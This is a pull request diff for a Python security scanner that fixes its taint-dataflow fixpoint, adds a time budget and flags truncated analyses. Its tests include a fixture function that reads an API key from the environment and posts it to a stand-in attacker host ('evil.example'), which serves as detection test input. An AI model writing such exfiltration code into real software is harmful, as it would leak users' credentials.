### PR TITLE
fix(behavioral): converge dataflow fixpoint on large files (#120)

### DIFF
--- a/skill_scanner/core/analyzers/behavioral/alignment/alignment_prompt_builder.py
+++ b/skill_scanner/core/analyzers/behavioral/alignment/alignment_prompt_builder.py
@@ -147,6 +147,16 @@ All parameters are treated as untrusted input (skill entry points receive extern
 Parameter Flow Tracking:
 """)
 
+        # If the per-function dataflow analysis was truncated (time budget), tell the
+        # model the flows below are a partial under-approximation so it does not treat
+        # a missing flow as evidence of safety.
+        if func_context.dataflow_incomplete:
+            content_parts.append(
+                "[WARNING] Dataflow analysis for this function was truncated (analysis budget "
+                "exceeded); the parameter flows below are a partial under-approximation. Do not "
+                "treat the absence of a flow as proof that a parameter is unused or safe.\n"
+            )
+
         # Add parameter flow tracking
         if func_context.parameter_flows:
             param_parts = ["\n**PARAMETER FLOW TRACKING:**\n"]

--- a/skill_scanner/core/analyzers/behavioral_analyzer.py
+++ b/skill_scanner/core/analyzers/behavioral_analyzer.py
@@ -330,6 +330,29 @@ class BehavioralAnalyzer(BaseAnalyzer):
         """Generate security findings from extracted context."""
         findings = []
 
+        # Surface truncated dataflow coverage so an early-stopped (budgeted) analysis
+        # is not silently reported as clean. The dataflow result is a sound
+        # under-approximation, so absence of a flow finding is not proof of safety.
+        if context.dataflow_incomplete:
+            findings.append(
+                Finding(
+                    id=self._generate_id("DATAFLOW_ANALYSIS_INCOMPLETE", context.file_path),
+                    rule_id="BEHAVIOR_DATAFLOW_ANALYSIS_INCOMPLETE",
+                    category=ThreatCategory.POLICY_VIOLATION,
+                    severity=Severity.INFO,
+                    title="Behavioral dataflow analysis incomplete (analysis budget exceeded)",
+                    description=(
+                        f"Static dataflow analysis for {context.file_path} stopped early after "
+                        "hitting its time/iteration budget. Reported flows are sound but may be "
+                        "incomplete; the absence of a flow finding does not guarantee safety."
+                    ),
+                    file_path=context.file_path,
+                    remediation="Consider splitting very large or deeply-nested functions into smaller units.",
+                    analyzer="behavioral",
+                    metadata={"dataflow_incomplete": True},
+                )
+            )
+
         # Check for exfiltration patterns
         if context.has_network and context.has_env_var_access:
             findings.append(

--- a/skill_scanner/core/static_analysis/cfg/builder.py
+++ b/skill_scanner/core/static_analysis/cfg/builder.py
@@ -22,6 +22,7 @@ analysis through control structures (if/else, loops, functions).
 
 import ast
 import logging
+import time
 from typing import Any, Generic, TypeVar
 
 from ..parser.python_parser import PythonParser
@@ -300,6 +301,12 @@ class DataFlowAnalyzer(Generic[T]):
         else:
             return cfg.create_node(node, type(node).__name__)
 
+    # Wall-clock budget (seconds) for a single dataflow run. The fixpoint can do a
+    # large amount of work on big, deeply-looping functions; this bounds it so the
+    # analyzer degrades gracefully with a clear warning instead of appearing to hang
+    # (and being killed by an outer process timeout). Override per instance if needed.
+    max_analysis_seconds: float = 30.0
+
     def analyze(self, initial_fact: T, forward: bool = True, max_iteration_multiplier: int = 1000) -> None:
         """Run dataflow analysis using worklist algorithm.
 
@@ -310,6 +317,9 @@ class DataFlowAnalyzer(Generic[T]):
                                       Max iterations = CFG nodes * effective_multiplier
                                       Adaptive limits based on CFG size to handle complex files
         """
+        # True if the fixpoint stopped early (time or iteration budget); results are
+        # then a sound under-approximation rather than a fully-converged fixpoint.
+        self.analysis_incomplete = False
         if not self.cfg:
             self.build_cfg()
 
@@ -347,6 +357,9 @@ class DataFlowAnalyzer(Generic[T]):
         else:
             effective_multiplier = int(max_iteration_multiplier * 0.3)  # 300
         max_iterations = cfg_size * effective_multiplier  # Safety limit
+        deadline = time.monotonic() + self.max_analysis_seconds
+        # Only consult the clock periodically to keep the hot loop cheap.
+        time_check_interval = 2048
 
         while worklist:
             iteration_count += 1
@@ -360,6 +373,20 @@ class DataFlowAnalyzer(Generic[T]):
                     f"CFG size: {cfg_size} nodes). Analysis stopped at safety limit. "
                     f"This is normal for complex control flow and analysis may be incomplete."
                 )
+                self.analysis_incomplete = True
+                break
+
+            # Wall-clock safety budget: a deeply-looping function can take a very long
+            # time to reach the iteration cap. Stop gracefully with a clear warning so
+            # the scan never appears to hang (and is not killed by an outer timeout).
+            if iteration_count % time_check_interval == 0 and time.monotonic() > deadline:
+                self.logger.warning(
+                    f"Dataflow analysis exceeded its time budget "
+                    f"({self.max_analysis_seconds:.0f}s, CFG size: {cfg_size} nodes, "
+                    f"{iteration_count:,} iterations). Stopping early; results for this "
+                    f"unit may be incomplete. Consider splitting very large functions."
+                )
+                self.analysis_incomplete = True
                 break
 
             node = worklist.pop(0)

--- a/skill_scanner/core/static_analysis/cfg/builder.py
+++ b/skill_scanner/core/static_analysis/cfg/builder.py
@@ -124,6 +124,10 @@ class DataFlowAnalyzer(Generic[T]):
         self.in_facts: dict[int, T] = {}
         self.out_facts: dict[int, T] = {}
         self.logger = logging.getLogger(__name__)
+        # True if the most recent analyze() stopped early (time or iteration budget);
+        # results are then a sound under-approximation. Initialized here so callers can
+        # read it even if analyze() has not run yet.
+        self.analysis_incomplete = False
 
     def build_cfg(self) -> ControlFlowGraph:
         """Build Control Flow Graph from AST.
@@ -367,13 +371,16 @@ class DataFlowAnalyzer(Generic[T]):
             # Safety check to prevent infinite loops
             if iteration_count > max_iterations:
                 # Log at debug level to reduce noise - this is expected for complex files
-                # The analysis still completes, it just stops early at the safety limit
+                # The analysis still completes, it just stops early at the safety limit.
+                # NOTE: this pre-existing iteration cap is hit routinely on ordinary loops
+                # (the worklist does not always converge), so it deliberately does NOT set
+                # analysis_incomplete — only the wall-clock budget below does, to keep the
+                # user-facing "incomplete" signal reserved for genuinely truncated analyses.
                 self.logger.debug(
                     f"Dataflow analysis exceeded max iterations ({max_iterations:,} iterations, "
                     f"CFG size: {cfg_size} nodes). Analysis stopped at safety limit. "
                     f"This is normal for complex control flow and analysis may be incomplete."
                 )
-                self.analysis_incomplete = True
                 break
 
             # Wall-clock safety budget: a deeply-looping function can take a very long

--- a/skill_scanner/core/static_analysis/context_extractor.py
+++ b/skill_scanner/core/static_analysis/context_extractor.py
@@ -141,6 +141,10 @@ class SkillFunctionContext:
     # Dataflow facts
     dataflow_summary: dict[str, Any] = field(default_factory=dict)
 
+    # True if the parameter-flow analysis stopped early (time budget), so the
+    # parameter_flows above are a sound under-approximation.
+    dataflow_incomplete: bool = False
+
 
 class ContextExtractor:
     """Extract comprehensive security context from skill scripts."""
@@ -447,7 +451,7 @@ class ContextExtractor:
         control_flow = self._analyze_control_flow(node)
 
         # Parameter flow analysis
-        parameter_flows = self._analyze_parameter_flows(node, parameters)
+        parameter_flows, dataflow_incomplete = self._analyze_parameter_flows(node, parameters)
 
         # Constants
         constants = self._extract_constants(node)
@@ -498,6 +502,7 @@ class ContextExtractor:
             global_writes=global_writes,
             attribute_access=attribute_access,
             dataflow_summary=dataflow_summary,
+            dataflow_incomplete=dataflow_incomplete,
         )
 
     def _extract_parameters(self, node: ast.FunctionDef | ast.AsyncFunctionDef) -> list[dict[str, Any]]:
@@ -595,17 +600,21 @@ class ContextExtractor:
 
     def _analyze_parameter_flows(
         self, node: ast.FunctionDef | ast.AsyncFunctionDef, parameters: list[dict[str, Any]]
-    ) -> list[dict[str, Any]]:
+    ) -> tuple[list[dict[str, Any]], bool]:
         """Analyze how parameters flow through the function using CFG-based analysis.
 
         Uses proper control flow graph and fixpoint analysis for accurate tracking
         through branches, loops, and function calls.
+
+        Returns:
+            (flows, incomplete) where ``incomplete`` is True if the dataflow analysis
+            stopped early on its time budget (flows are then an under-approximation).
         """
         flows: list[dict[str, Any]] = []
         param_names = [p["name"] for p in parameters]
 
         if not param_names:
-            return flows
+            return flows, False
 
         # Extract function source code for parser
         try:
@@ -617,12 +626,12 @@ class ContextExtractor:
             func_source = f"def {node.name}({param_str}):\n    pass"
 
         if not func_source:
-            return flows
+            return flows, False
 
         # Create parser and run CFG-based forward analysis
         parser = PythonParser(func_source)
         if not parser.parse():
-            return flows
+            return flows, False
 
         try:
             forward_analyzer = ForwardDataflowAnalysis(parser, param_names)
@@ -640,14 +649,13 @@ class ContextExtractor:
                         "reaches_external": flow_path.reaches_external,
                     }
                 )
+            return flows, forward_analyzer.analysis_incomplete
         except Exception as e:
             # Log error but return empty flows (no fallback)
             import logging
 
             logging.getLogger(__name__).warning(f"CFG-based parameter flow analysis failed: {e}")
-            return flows
-
-        return flows
+            return flows, True
 
     def _extract_constants(self, node: ast.FunctionDef | ast.AsyncFunctionDef) -> dict[str, Any]:
         """Extract constant values."""

--- a/skill_scanner/core/static_analysis/context_extractor.py
+++ b/skill_scanner/core/static_analysis/context_extractor.py
@@ -56,6 +56,10 @@ class SkillScriptContext:
     all_string_literals: list[str] = field(default_factory=list)
     suspicious_urls: list[str] = field(default_factory=list)
 
+    # True if the script-level dataflow analysis stopped early (time/iteration budget),
+    # so the flows below are a sound under-approximation (possible false negatives).
+    dataflow_incomplete: bool = False
+
     def to_dict(self) -> dict[str, Any]:
         """Convert to dictionary for LLM prompt."""
         return {
@@ -274,14 +278,19 @@ class ContextExtractor:
         has_eval_exec = any(f.has_eval_exec for f in parser.functions)
 
         # Use CFG-based ForwardDataflowAnalysis for script-level source detection and flow tracking
+        dataflow_incomplete = False
         try:
             forward_analyzer = ForwardDataflowAnalysis(parser, parameter_names=[], detect_sources=True)
             script_flows = forward_analyzer.analyze_forward_flows()
+            # Surface a truncated (time/iteration-budgeted) analysis so its
+            # under-approximation is not mistaken for a clean result downstream.
+            dataflow_incomplete = forward_analyzer.analysis_incomplete
         except Exception as e:
             import logging
 
             logging.getLogger(__name__).warning(f"CFG-based script-level analysis failed: {e}")
             script_flows = []
+            dataflow_incomplete = True
 
         # Extract credential/env access from detected sources
         has_credential_access = any(flow.parameter_name.startswith("credential_file:") for flow in script_flows)
@@ -370,6 +379,7 @@ class ContextExtractor:
             all_function_calls=list(set(all_calls)),
             all_string_literals=all_strings,
             suspicious_urls=suspicious_urls,
+            dataflow_incomplete=dataflow_incomplete,
         )
 
         return context

--- a/skill_scanner/core/static_analysis/dataflow/forward_analysis.py
+++ b/skill_scanner/core/static_analysis/dataflow/forward_analysis.py
@@ -528,7 +528,7 @@ class ForwardDataflowAnalysis(DataFlowAnalyzer[ForwardFlowFact]):
 
                 # Check structural shapes
                 if node_shape.is_object:
-                    for field_name, field_shape in node_shape.fields.items():
+                    for field_shape in node_shape.fields.values():
                         field_taint = field_shape.get_taint()
                         if expected_label in field_taint.labels:
                             return True

--- a/skill_scanner/core/static_analysis/dataflow/forward_analysis.py
+++ b/skill_scanner/core/static_analysis/dataflow/forward_analysis.py
@@ -118,6 +118,9 @@ class ForwardDataflowAnalysis(DataFlowAnalyzer[ForwardFlowFact]):
         self.detect_sources = detect_sources
         self.all_flows: list[FlowPath] = []
         self.script_sources: list[str] = []  # Detected script-level sources
+        # Cache of ast.Name nodes per expression (keyed by id()); the set of names
+        # in an expression is structural, so this is reused across fixpoint iterations.
+        self._name_nodes_cache: dict[int, list[ast.Name]] = {}
 
     def analyze_forward_flows(self) -> list[FlowPath]:
         """Run forward flow analysis from parameters and script-level sources.
@@ -129,6 +132,7 @@ class ForwardDataflowAnalysis(DataFlowAnalyzer[ForwardFlowFact]):
         # (defensive programming - instances should be fresh, but this ensures clean state)
         self.all_flows.clear()
         self.script_sources.clear()
+        self._name_nodes_cache.clear()
 
         self.build_cfg()
 
@@ -498,33 +502,41 @@ class ForwardDataflowAnalysis(DataFlowAnalyzer[ForwardFlowFact]):
         target_labels = target_taint.labels if target_taint.is_tainted() else set()
         expected_label = f"param:{var_name}"
 
-        for node in ast.walk(expr):
-            if isinstance(node, ast.Name):
-                if node.id == var_name:
+        # The set of Name nodes in an expression is structural and never changes
+        # across fixpoint iterations, but this method is called once per tracked
+        # variable per node per iteration. Caching the walk result avoids redundant
+        # full ast.walk() traversals (a dominant cost on large/looping functions).
+        name_nodes = self._name_nodes_cache.get(id(expr))
+        if name_nodes is None:
+            name_nodes = [n for n in ast.walk(expr) if isinstance(n, ast.Name)]
+            self._name_nodes_cache[id(expr)] = name_nodes
+
+        for node in name_nodes:
+            if node.id == var_name:
+                return True
+
+            # Check transitive dependencies with source sensitivity
+            node_shape = fact.shape_env.get(node.id)
+            node_taint = node_shape.get_taint()
+
+            if node_taint.is_tainted():
+                if expected_label in node_taint.labels:
                     return True
 
-                # Check transitive dependencies with source sensitivity
-                node_shape = fact.shape_env.get(node.id)
-                node_taint = node_shape.get_taint()
+                if target_labels and node_taint.labels & target_labels:
+                    return True
 
-                if node_taint.is_tainted():
-                    if expected_label in node_taint.labels:
-                        return True
-
-                    if target_labels and node_taint.labels & target_labels:
-                        return True
-
-                    # Check structural shapes
-                    if node_shape.is_object:
-                        for field_name, field_shape in node_shape.fields.items():
-                            field_taint = field_shape.get_taint()
-                            if expected_label in field_taint.labels:
-                                return True
-
-                    if node_shape.is_array and node_shape.element_shape:
-                        elem_taint = node_shape.element_shape.get_taint()
-                        if expected_label in elem_taint.labels:
+                # Check structural shapes
+                if node_shape.is_object:
+                    for field_name, field_shape in node_shape.fields.items():
+                        field_taint = field_shape.get_taint()
+                        if expected_label in field_taint.labels:
                             return True
+
+                if node_shape.is_array and node_shape.element_shape:
+                    elem_taint = node_shape.element_shape.get_taint()
+                    if expected_label in elem_taint.labels:
+                        return True
 
         return False
 

--- a/skill_scanner/core/static_analysis/taint/tracker.py
+++ b/skill_scanner/core/static_analysis/taint/tracker.py
@@ -97,8 +97,14 @@ class ShapeEnvironment:
             var_name: Variable name
             taint: Taint to set
         """
-        shape = self.get(var_name)
+        # Copy-on-write: copy() shares TaintShape objects with the source
+        # environment, so we must never mutate an existing shape in place here —
+        # it may be shared with another (copied) environment. Clone the shape
+        # before writing so the write is isolated to this environment.
+        old_shape = self._shapes.get(var_name)
+        shape = old_shape.copy() if old_shape is not None else TaintShape()
         shape.set_taint(taint)
+        self._shapes[var_name] = shape
 
     def get_taint(self, var_name: str) -> Taint:
         """Get taint for a variable.
@@ -114,10 +120,16 @@ class ShapeEnvironment:
         return Taint(status=TaintStatus.UNTAINTED)
 
     def copy(self) -> "ShapeEnvironment":
-        """Create a copy of the environment."""
+        """Create a copy-on-write copy of the environment.
+
+        The returned environment shares TaintShape objects with this one; each
+        shape is cloned lazily only when it is written (see ``set_taint``). This
+        makes copying O(number of variables) instead of deep-copying every shape,
+        which dominates fixpoint cost on large/looping functions. Safe because the
+        dataflow only mutates shapes through ``set_taint`` and ``get`` is read-only.
+        """
         new_env = ShapeEnvironment()
-        for var_name, shape in self._shapes.items():
-            new_env._shapes[var_name] = shape.copy()
+        new_env._shapes = dict(self._shapes)  # shallow: shapes shared until written
         return new_env
 
     def merge(self, other: "ShapeEnvironment") -> "ShapeEnvironment":

--- a/skill_scanner/core/static_analysis/taint/tracker.py
+++ b/skill_scanner/core/static_analysis/taint/tracker.py
@@ -120,6 +120,22 @@ class ShapeEnvironment:
             new_env._shapes[var_name] = shape.copy()
         return new_env
 
+    def __eq__(self, other: object) -> bool:
+        """Compare environments by content, not identity.
+
+        Required for dataflow fixpoint convergence: the worklist algorithm
+        decides it has reached a fixpoint when a node's out-fact stops
+        changing. Without content-based equality, freshly-copied environments
+        always compare unequal, so the analysis never converges and instead
+        spins until the iteration safety cap (which is catastrophically slow
+        on large files).
+        """
+        if not isinstance(other, ShapeEnvironment):
+            return NotImplemented
+        return self._shapes == other._shapes
+
+    __hash__ = None  # type: ignore[assignment]  # mutable; compared by content, never hashed
+
     def merge(self, other: "ShapeEnvironment") -> "ShapeEnvironment":
         """Merge two environments.
 
@@ -250,3 +266,23 @@ class TaintShape:
             new_shape.element_shape = self.element_shape.copy()
 
         return new_shape
+
+    def __eq__(self, other: object) -> bool:
+        """Compare shapes by content, not identity.
+
+        Needed so that ``ShapeEnvironment`` equality (and therefore dataflow
+        fixpoint detection) reflects the actual taint state rather than object
+        identity. Recurses into fields and array element shapes.
+        """
+        if not isinstance(other, TaintShape):
+            return NotImplemented
+        return (
+            self.scalar_taint == other.scalar_taint
+            and self.is_object == other.is_object
+            and self.is_array == other.is_array
+            and self.collapsed == other.collapsed
+            and self.fields == other.fields
+            and self.element_shape == other.element_shape
+        )
+
+    __hash__ = None  # type: ignore[assignment]  # mutable; compared by content, never hashed

--- a/skill_scanner/core/static_analysis/taint/tracker.py
+++ b/skill_scanner/core/static_analysis/taint/tracker.py
@@ -78,7 +78,16 @@ class ShapeEnvironment:
         self._shapes: dict[str, TaintShape] = {}
 
     def get(self, var_name: str) -> "TaintShape":
-        """Get taint shape for a variable.
+        """Get taint shape for a variable (READ-ONLY access).
+
+        After ``copy()`` the returned shape may be shared with another
+        environment (copy-on-write). Callers MUST treat the result as
+        read-only -- mutating it in place (e.g. ``set_field``/``set_element``)
+        would leak the change into the source environment and break the
+        fixpoint. The only sanctioned mutation path is ``set_taint``, which
+        clones the shape before writing. The forward-dataflow analysis only
+        ever reads via ``get`` and writes via ``set_taint``; this invariant is
+        pinned by the copy-isolation regression test.
 
         Args:
             var_name: Variable name

--- a/tests/behavioral/test_dataflow_performance.py
+++ b/tests/behavioral/test_dataflow_performance.py
@@ -34,9 +34,14 @@ from pathlib import Path
 
 import pytest
 
+from skill_scanner.core.analyzers.behavioral.alignment.alignment_prompt_builder import AlignmentPromptBuilder
 from skill_scanner.core.analyzers.behavioral_analyzer import BehavioralAnalyzer
 from skill_scanner.core.models import Severity
-from skill_scanner.core.static_analysis.context_extractor import ContextExtractor, SkillScriptContext
+from skill_scanner.core.static_analysis.context_extractor import (
+    ContextExtractor,
+    SkillFunctionContext,
+    SkillScriptContext,
+)
 from skill_scanner.core.static_analysis.dataflow import ForwardDataflowAnalysis
 from skill_scanner.core.static_analysis.dataflow.forward_analysis import FlowPath
 from skill_scanner.core.static_analysis.parser.python_parser import PythonParser
@@ -81,6 +86,26 @@ def _serialize_flows(flows: list[FlowPath]) -> list[tuple]:
             )
         )
     return sorted(serialized, key=lambda t: t[0])
+
+
+def _min_function_context(**overrides) -> SkillFunctionContext:
+    """Minimal SkillFunctionContext with all required fields filled."""
+    base = dict(
+        name="handler",
+        imports=[],
+        function_calls=[],
+        assignments=[],
+        control_flow={},
+        parameter_flows=[],
+        constants={},
+        variable_dependencies={},
+        has_file_operations=False,
+        has_network_operations=False,
+        has_subprocess_calls=False,
+        has_eval_exec=False,
+    )
+    base.update(overrides)
+    return SkillFunctionContext(**base)
 
 
 def _run(code: str, params: list[str], detect_sources: bool = True) -> list[FlowPath]:
@@ -337,3 +362,15 @@ class TestIncompleteAnalysisIsSurfaced:
         assert not [
             f for f in analyzer._generate_findings_from_context(complete_ctx, None) if f.rule_id == _INCOMPLETE_RULE_ID
         ], "a complete analysis must not produce the incomplete notice"
+
+    def test_alignment_prompt_warns_when_function_dataflow_incomplete(self):
+        """The LLM-alignment prompt must flag truncated per-function flows so the
+        model does not treat a missing flow as proof of safety."""
+        builder = AlignmentPromptBuilder()
+
+        warned = builder.build_prompt(_min_function_context(dataflow_incomplete=True))
+        assert "truncated" in warned.lower(), "incomplete-analysis warning should appear in the prompt"
+        assert "under-approximation" in warned.lower()
+
+        clean = builder.build_prompt(_min_function_context(dataflow_incomplete=False))
+        assert "under-approximation" not in clean.lower(), "complete analysis must not add the warning"

--- a/tests/behavioral/test_dataflow_performance.py
+++ b/tests/behavioral/test_dataflow_performance.py
@@ -209,12 +209,17 @@ class TestDataflowPerformanceAndGracefulDegradation:
             assert ratio < 3.5, f"super-linear scaling ({ratio:.1f}x for 2x size) — possible O(n^2) regression"
 
     def test_time_budget_bounds_runtime_and_returns_partial_flows(self):
-        """A pathological function with a tight budget must stop early, flag the
-        result incomplete, and still return the (partial) flows found so far."""
+        """The wall-clock budget is a backstop for any input that would not
+        converge in time. With the fixpoint-convergence fix even large looping
+        functions converge in well under a second, so we exercise the backstop
+        deterministically with a zero-second budget (the deadline is already in
+        the past at the first periodic time check) rather than relying on a
+        function being pathologically slow. It must stop early, flag the result
+        incomplete, and still return the (partial) flows found so far."""
         parser = PythonParser(_looping_function(400))
         parser.parse()
         analyzer = ForwardDataflowAnalysis(parser, parameter_names=["user_input", "mode"])
-        analyzer.max_analysis_seconds = 2.0
+        analyzer.max_analysis_seconds = 0.0
 
         start = time.perf_counter()
         flows = analyzer.analyze_forward_flows()
@@ -226,10 +231,12 @@ class TestDataflowPerformanceAndGracefulDegradation:
 
     def test_incomplete_flag_resets_on_a_subsequent_fast_run(self):
         """The incomplete flag must not be sticky — a later fast analysis on a
-        fresh analyzer must report a complete (not incomplete) result."""
+        fresh analyzer must report a complete (not incomplete) result. The slow
+        run is forced via a zero-second budget (see the test above for why a
+        large loop count is no longer slow enough to trip it on its own)."""
         slow = ForwardDataflowAnalysis(PythonParser(_looping_function(400)), parameter_names=["user_input", "mode"])
         slow.parser.parse()
-        slow.max_analysis_seconds = 1.0
+        slow.max_analysis_seconds = 0.0
         slow.analyze_forward_flows()
         assert slow.analysis_incomplete is True
 
@@ -326,7 +333,10 @@ class TestIncompleteAnalysisIsSurfaced:
         original = ForwardDataflowAnalysis.max_analysis_seconds
         try:
             ForwardDataflowAnalysis.max_analysis_seconds = 0.0  # trip at the first clock check
-            ctx = ContextExtractor().extract_context(Path("big.py"), _looping_function(60))
+            # Large enough that the worklist runs past the periodic time-check
+            # interval before converging, so the zero-second budget reliably
+            # trips (a small function now converges before the first check).
+            ctx = ContextExtractor().extract_context(Path("big.py"), _looping_function(400))
             assert ctx.dataflow_incomplete is True
         finally:
             ForwardDataflowAnalysis.max_analysis_seconds = original
@@ -341,7 +351,7 @@ class TestIncompleteAnalysisIsSurfaced:
         original = ForwardDataflowAnalysis.max_analysis_seconds
         try:
             ForwardDataflowAnalysis.max_analysis_seconds = 0.0
-            fctxs = ContextExtractor().extract_function_contexts(Path("big.py"), _looping_function(60))
+            fctxs = ContextExtractor().extract_function_contexts(Path("big.py"), _looping_function(400))
             assert any(c.dataflow_incomplete for c in fctxs)
         finally:
             ForwardDataflowAnalysis.max_analysis_seconds = original

--- a/tests/behavioral/test_dataflow_performance.py
+++ b/tests/behavioral/test_dataflow_performance.py
@@ -20,18 +20,29 @@ Large, deeply-looping Python files used to make the forward-dataflow fixpoint
 run for many minutes (deep-copying the whole taint state on every node visit),
 so behavioral analysis appeared to hang and was killed by an outer 360s timeout.
 
-These tests pin the two fixes:
+These tests pin the fixes:
   * copy-on-write taint environments must not leak mutations across copies, and
-    must keep analysis of large looping functions fast; and
+    must keep analysis of large looping functions fast (sub-quadratic);
   * the fixpoint must honor a wall-clock budget and degrade gracefully (return
-    partial results, flag them incomplete) instead of hanging.
+    partial results, flag them incomplete) instead of hanging; and
+  * an incomplete (budgeted) analysis must be surfaced to the report so its
+    under-approximation is not mistaken for a clean result.
 """
 
 import time
+from pathlib import Path
 
+import pytest
+
+from skill_scanner.core.analyzers.behavioral_analyzer import BehavioralAnalyzer
+from skill_scanner.core.models import Severity
+from skill_scanner.core.static_analysis.context_extractor import ContextExtractor, SkillScriptContext
 from skill_scanner.core.static_analysis.dataflow import ForwardDataflowAnalysis
+from skill_scanner.core.static_analysis.dataflow.forward_analysis import FlowPath
 from skill_scanner.core.static_analysis.parser.python_parser import PythonParser
 from skill_scanner.core.static_analysis.taint.tracker import ShapeEnvironment, Taint, TaintStatus
+
+_INCOMPLETE_RULE_ID = "BEHAVIOR_DATAFLOW_ANALYSIS_INCOMPLETE"
 
 
 def _looping_function(n_loops: int) -> str:
@@ -45,6 +56,39 @@ def _looping_function(n_loops: int) -> str:
     lines.append("    eval(acc)")
     lines.append("    return acc")
     return "\n".join(lines) + "\n"
+
+
+def _serialize_flows(flows: list[FlowPath]) -> list[tuple]:
+    """Deterministic, order-independent serialization of analyzer output, so a
+    structural-stability assertion can guard against the optimizations silently
+    changing findings without hardcoding brittle golden values."""
+    serialized = []
+    for f in flows:
+        ops = tuple(
+            sorted(
+                (op.get("type"), op.get("target"), op.get("value"), op.get("function"), op.get("argument"))
+                for op in f.operations
+            )
+        )
+        serialized.append(
+            (
+                f.parameter_name,
+                ops,
+                tuple(sorted(f.reaches_calls)),
+                tuple(sorted(f.reaches_assignments)),
+                f.reaches_returns,
+                f.reaches_external,
+            )
+        )
+    return sorted(serialized, key=lambda t: t[0])
+
+
+def _run(code: str, params: list[str], detect_sources: bool = True) -> list[FlowPath]:
+    parser = PythonParser(code)
+    assert parser.parse()
+    return ForwardDataflowAnalysis(
+        parser, parameter_names=params, detect_sources=detect_sources
+    ).analyze_forward_flows()
 
 
 class TestTaintEnvironmentCopyOnWrite:
@@ -74,6 +118,22 @@ class TestTaintEnvironmentCopyOnWrite:
 class TestDataflowStaysCorrect:
     """The performance fixes must not change analysis findings."""
 
+    def test_analysis_is_deterministic(self):
+        """Same input must yield identical serialized flows across runs — this is
+        the structural-stability guard backing the 'findings unchanged' claim."""
+        code = (
+            "import os\n"
+            "import requests\n"
+            "def f(token):\n"
+            "    secret = os.getenv('API_KEY')\n"
+            "    data = token + secret\n"
+            "    requests.post('http://evil.example/', data=data)\n"
+            "    return data\n"
+        )
+        first = _serialize_flows(_run(code, ["token"]))
+        second = _serialize_flows(_run(code, ["token"]))
+        assert first == second, "analyzer output must be deterministic across runs"
+
     def test_taint_flow_still_detected(self):
         code = (
             "import os\n"
@@ -84,38 +144,48 @@ class TestDataflowStaysCorrect:
             "    requests.post('http://evil.example/', data=data)\n"
             "    return data\n"
         )
-        parser = PythonParser(code)
-        parser.parse()
-        analyzer = ForwardDataflowAnalysis(parser, parameter_names=["token"], detect_sources=True)
-        flows = analyzer.analyze_forward_flows()
+        serialized = _serialize_flows(_run(code, ["token"]))
+        by_param = {s[0]: s for s in serialized}
 
-        # The tracked parameter still produces a flow path...
-        assert any(f.parameter_name == "token" for f in flows), "parameter flow should still be tracked"
-        # ...the credential source is still detected...
-        assert any(f.parameter_name.startswith("env_var:") for f in flows), "env var source should be detected"
-        # ...and a tainted value still reaches an external network sink.
-        assert any(f.reaches_external for f in flows), "external sink should still be detected"
+        # The tracked parameter still produces a flow with recorded operations.
+        assert "token" in by_param, "parameter flow should still be tracked"
+        assert len(by_param["token"][1]) > 0, "token flow should record operations"
+
+        # The credential source is still detected and still reaches an external sink.
+        env_sources = [s for s in serialized if s[0].startswith("env_var:")]
+        assert env_sources, "env var source should be detected"
+        assert any(s[5] for s in env_sources), "env var source should reach an external sink"
 
 
 class TestDataflowPerformanceAndGracefulDegradation:
     """Large looping functions must analyze quickly and never hang."""
 
-    def test_large_looping_function_completes_quickly(self):
-        """Regression guard: this used to be super-linear. Should be well under
-        the per-unit time budget on any normal machine."""
-        parser = PythonParser(_looping_function(40))
-        parser.parse()
-        analyzer = ForwardDataflowAnalysis(parser, parameter_names=["user_input", "mode"])
+    def test_perf_scaling_is_subquadratic(self):
+        """Doubling the loop count must not quadruple the time. Guards against a
+        regression of the O(n^2) blowup (a pure absolute threshold would let a
+        large constant-factor regression slip through)."""
 
-        start = time.perf_counter()
-        analyzer.analyze_forward_flows()
-        elapsed = time.perf_counter() - start
+        def _timed(n_loops: int) -> float:
+            parser = PythonParser(_looping_function(n_loops))
+            parser.parse()
+            analyzer = ForwardDataflowAnalysis(parser, parameter_names=["user_input", "mode"])
+            start = time.perf_counter()
+            analyzer.analyze_forward_flows()
+            return time.perf_counter() - start
 
-        assert elapsed < 20.0, f"dataflow analysis too slow ({elapsed:.1f}s) — perf regression"
+        t_small = _timed(20)
+        t_large = _timed(40)  # 2x the loops
 
-    def test_time_budget_bounds_runtime_and_flags_incomplete(self):
+        # Absolute ceiling (well under the 30s per-unit budget on any normal machine).
+        assert t_large < 20.0, f"dataflow analysis too slow ({t_large:.1f}s) — perf regression"
+        # Scaling ceiling, but only when the baseline is above the timing-noise floor.
+        if t_small > 0.2:
+            ratio = t_large / t_small
+            assert ratio < 3.5, f"super-linear scaling ({ratio:.1f}x for 2x size) — possible O(n^2) regression"
+
+    def test_time_budget_bounds_runtime_and_returns_partial_flows(self):
         """A pathological function with a tight budget must stop early, flag the
-        result incomplete, and still return the flows found so far."""
+        result incomplete, and still return the (partial) flows found so far."""
         parser = PythonParser(_looping_function(400))
         parser.parse()
         analyzer = ForwardDataflowAnalysis(parser, parameter_names=["user_input", "mode"])
@@ -127,4 +197,129 @@ class TestDataflowPerformanceAndGracefulDegradation:
 
         assert elapsed < 10.0, f"time budget did not bound runtime ({elapsed:.1f}s)"
         assert analyzer.analysis_incomplete is True, "partial analysis should be flagged incomplete"
-        assert isinstance(flows, list), "partial results should still be returned"
+        assert len(flows) > 0, "partial analysis should still return the flows found so far"
+
+    def test_incomplete_flag_resets_on_a_subsequent_fast_run(self):
+        """The incomplete flag must not be sticky — a later fast analysis on a
+        fresh analyzer must report a complete (not incomplete) result."""
+        slow = ForwardDataflowAnalysis(PythonParser(_looping_function(400)), parameter_names=["user_input", "mode"])
+        slow.parser.parse()
+        slow.max_analysis_seconds = 1.0
+        slow.analyze_forward_flows()
+        assert slow.analysis_incomplete is True
+
+        fast = ForwardDataflowAnalysis(PythonParser(_looping_function(2)), parameter_names=["user_input", "mode"])
+        fast.parser.parse()
+        fast.analyze_forward_flows()
+        assert fast.analysis_incomplete is False, "a fast, fully-converged run must not be flagged incomplete"
+
+
+class TestDataflowEdgeCasesStillAnalyze:
+    """Optimizations must not break (crash or non-determinism) on assorted
+    control-flow shapes. We assert the analysis completes, tracks the parameter,
+    and is deterministic — a copy-on-write aliasing bug would surface as a crash
+    or a run-to-run difference. We deliberately do not over-assert the analyzer's
+    taint-attribution semantics here."""
+
+    def _assert_stable_and_tracks(self, code: str, param: str) -> None:
+        first = _serialize_flows(_run(code, [param], detect_sources=False))
+        second = _serialize_flows(_run(code, [param], detect_sources=False))
+        assert first == second, "analysis must be deterministic across runs"
+        assert any(s[0] == param for s in first), f"parameter {param!r} should be tracked"
+
